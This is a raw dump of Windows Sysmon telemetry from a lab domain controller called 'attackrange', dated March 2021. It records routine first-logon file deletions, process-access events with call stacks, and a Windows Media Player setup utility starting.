Explorer\brndlog.bakMD5=840DF767CAC9367CBBFD774EF011EAF3,SHA256=B2BAC5F3DE47D5C7ACDC0F8AFC4FFD4740260880C0A0CF4E4383495AB1AA98DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.699{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9B94.tmpMD5=A828B8C496779BDB61FCE06BA0D57C39,SHA256=C952F470A428D5D61ED52FB05C0143258687081E1AD13CFE6FF58037B375364D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.621{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12BE81463E0D543477479E48444FCFA8,SHA256=202966D11E3A39730CE966EFAD5765208657903E2282ED2024623D5F71AC6C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.544{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9B94.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:20.310{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.310{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64CA-6064-AC00-00000000AE01}4212C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:20.310{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI99DD.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.108{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI99DD.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.108{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI997F.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:20.014{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI997F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:20.014{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGI9920.tmpMD5=DD4F5026AA316D4AEC4A9D789E63E67B,SHA256=8D7E6CEE70D6035C066B93143461D5F636E144373F5C46BC10A8935D306E0737,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.914{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.914{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.914{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+f539d|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.919{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe12.0.14393.4169 (rs1_release.210107-1130)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=0AFAF8B10C3D2B009DED280C875EA3EA,SHA256=CFC5A8170AF2CCB8F846BA738E5173596A4C35C023BCE5E6EB04E07779283188,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 
10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.805{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B100-00000000AE01}2844C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.805{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64CD-6064-B100-00000000AE01}2844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.805{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B100-00000000AE01}2844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.774{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.758{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.758{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+74a3|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1798E20E45A8E621E5BEB086D88DA95F,SHA256=E607EE13D3562C1AB5E2EA9A9818607D95FABA3E601A54A019E4624F55816172,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.634{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:21.634{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:21.135{266CAFBE-64CA-6064-AC00-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\System32\ie4uinit.exeC:\Users\Administrator\Favorites\Bing.urlMD5=5D42DDDDA9951546C9D43F0062C94D39,SHA256=E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.942{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms~RF1a4f5.TMPMD5=B376B5760CEC02680D8CDB6B39DC0C53,SHA256=4EE6127DEF47B36249A09A9545D3D0159B7A69180E5F721311E149BF3BE08229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
